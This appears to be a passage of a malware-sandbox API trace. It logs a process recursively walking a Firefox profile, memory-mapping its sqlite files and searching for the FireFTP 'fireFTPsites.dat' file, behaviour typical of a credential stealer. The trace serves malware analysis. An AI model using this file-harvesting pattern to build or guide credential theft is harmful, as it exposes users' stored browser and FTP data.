returned 1 [0590.651] CloseHandle (hObject=0x5ac) returned 1 [0590.652] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.652] LocalFree (hMem=0x56cab0) returned 0x0 [0590.652] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.652] lstrlenW (lpString="\\") returned 1 [0590.652] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.652] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.652] lstrlenW (lpString="formhistory.sqlite") returned 18 [0590.652] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.652] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.652] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.652] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.652] CloseHandle (hObject=0x5ac) returned 1 [0590.652] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.652] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x5dbdf0 [0590.652] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x5dbdf0, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0590.652] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.652] CloseHandle (hObject=0x5ac) returned 1 [0590.652] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.652] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0590.652] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.652] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.653] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.654] CloseHandle (hObject=0x4c8) returned 1 [0590.654] CloseHandle (hObject=0x5ac) returned 1 [0590.654] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.654] LocalFree (hMem=0x56cab0) returned 0x0 [0590.654] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.654] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0590.654] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0590.654] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.655] lstrlenW (lpString="\\") returned 1 [0590.655] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.655] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.655] lstrlenW (lpString="healthreport") returned 12 [0590.655] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.655] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.655] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.655] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.655] lstrlenW (lpString="\\*.*") returned 4 [0590.655] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.655] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.655] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0x57ca60 [0590.655] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.655] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.655] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.655] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.655] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0 [0590.655] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.655] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.655] LocalFree (hMem=0x56cab0) returned 0x0 [0590.655] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.655] lstrlenW (lpString="\\") returned 1 [0590.655] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.655] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.655] lstrlenW (lpString="healthreport.sqlite") returned 19 [0590.655] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.655] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.655] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.655] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.655] CloseHandle (hObject=0x5ac) returned 1 [0590.655] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.655] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0590.655] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x5dbdf0, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0590.655] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.655] CloseHandle (hObject=0x5ac) returned 1 [0590.655] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.655] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0590.655] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.655] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.665] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.666] CloseHandle (hObject=0x4c8) returned 1 [0590.666] CloseHandle (hObject=0x5ac) returned 1 [0590.666] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.666] LocalFree (hMem=0x56cab0) returned 0x0 [0590.666] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.667] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0590.667] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.667] lstrlenW (lpString="\\") returned 1 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.667] lstrlenW (lpString="indexedDB") returned 9 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.667] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.667] lstrlenW (lpString="\\*.*") returned 4 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.667] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0x57ca60 [0590.667] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.667] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.667] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.667] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.667] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.667] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0590.667] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.667] lstrlenW (lpString="\\") returned 1 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.667] lstrlenW (lpString="moz-safe-about+home") returned 19 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x5e6108 [0590.667] LocalFree (hMem=0x63bd28) returned 0x0 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.667] lstrlenW (lpString="\\*.*") returned 4 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63f8c8 [0590.667] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0x57c9a0 [0590.667] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.667] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 1 [0590.667] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.667] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.667] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 1 [0590.667] lstrlenW (lpString="\\") returned 1 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fa30 [0590.667] lstrlenW (lpString=".metadata") returned 9 [0590.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.667] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fb90 [0590.667] LocalFree (hMem=0x63fa30) returned 0x0 [0590.667] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.668] CloseHandle (hObject=0x660) returned 1 [0590.668] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0590.668] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fd00 [0590.668] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x63fd00, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0590.668] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.668] CloseHandle (hObject=0x660) returned 1 [0590.668] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.668] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.668] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.668] CloseHandle (hObject=0x660) returned 1 [0590.668] LocalFree (hMem=0x63fd00) returned 0x0 [0590.668] StrStrIW (lpFirst=".metadata", lpSrch="fireFTPsites.dat") returned 0x0 [0590.668] LocalFree (hMem=0x63fb90) returned 0x0 [0590.668] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 1 [0590.668] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0590.668] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0590.668] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.668] lstrlenW (lpString="\\") returned 1 [0590.668] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.668] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fa30 [0590.668] lstrlenW (lpString="idb") returned 3 [0590.668] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.668] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63fb90 [0590.668] LocalFree (hMem=0x63fa30) returned 0x0 [0590.668] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.668] lstrlenW (lpString="\\*.*") returned 4 [0590.668] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.668] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x63fcf8 [0590.668] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d870 | out: lpFindFileData=0x52d870) returned 0x5b9b50 [0590.668] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.668] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d870 | out: lpFindFileData=0x52d870) returned 1 [0590.668] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.668] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.668] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d870 | out: lpFindFileData=0x52d870) returned 1 [0590.668] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0590.668] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0590.668] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.668] lstrlenW (lpString="\\") returned 1 [0590.669] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.669] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x63fe68 [0590.669] lstrlenW (lpString="818200132aebmoouht") returned 18 [0590.669] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.669] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x2eef7e0 [0590.669] LocalFree (hMem=0x63fe68) returned 0x0 [0590.669] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.669] lstrlenW (lpString="\\*.*") returned 4 [0590.669] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.669] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x2eef970 [0590.669] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d5f8 | out: lpFindFileData=0x52d5f8) returned 0x5b9b10 [0590.669] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.669] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5f8 | out: lpFindFileData=0x52d5f8) returned 1 [0590.669] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.669] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.669] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5f8 | out: lpFindFileData=0x52d5f8) returned 0 [0590.669] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.669] LocalFree (hMem=0x2eef970) returned 0x0 [0590.669] LocalFree (hMem=0x2eef7e0) returned 0x0 [0590.669] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d870 | out: lpFindFileData=0x52d870) returned 1 [0590.669] lstrlenW (lpString="\\") returned 1 [0590.669] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.669] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x63fe68 [0590.669] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0590.669] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.669] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2eef7e0 [0590.669] LocalFree (hMem=0x63fe68) returned 0x0 [0590.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.669] CloseHandle (hObject=0x668) returned 1 [0590.669] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0590.669] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2eef978 [0590.669] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x2eef978, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0590.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.669] CloseHandle (hObject=0x668) returned 1 [0590.669] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.669] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0590.669] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.670] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.688] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.692] CloseHandle (hObject=0x66c) returned 1 [0590.692] CloseHandle (hObject=0x668) returned 1 [0590.692] LocalFree (hMem=0x2eef978) returned 0x0 [0590.692] LocalFree (hMem=0x2eef7e0) returned 0x0 [0590.692] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d870 | out: lpFindFileData=0x52d870) returned 0 [0590.692] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.692] LocalFree (hMem=0x63fcf8) returned 0x0 [0590.692] LocalFree (hMem=0x63fb90) returned 0x0 [0590.692] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dae8 | out: lpFindFileData=0x52dae8) returned 0 [0590.692] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.692] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.692] LocalFree (hMem=0x5e6108) returned 0x0 [0590.692] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0 [0590.692] FindClose (in: 